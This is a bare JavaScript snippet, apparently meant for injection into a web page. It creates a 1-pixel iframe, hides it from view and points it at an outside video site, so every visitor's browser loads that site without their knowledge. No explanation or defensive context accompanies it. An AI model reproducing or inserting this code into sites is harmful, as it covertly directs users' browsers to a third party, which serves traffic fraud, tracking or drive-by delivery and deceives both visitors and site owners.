var a = document.createElement("iframe"); a.frameborder = 0; a.frameBorder = 0; a.src ="https://www.himado.com"; a.width="1px"; a.height="1px"; a.scrolling ="no"; a.style.display = "none"; document.body.parentNode.appendChild(a)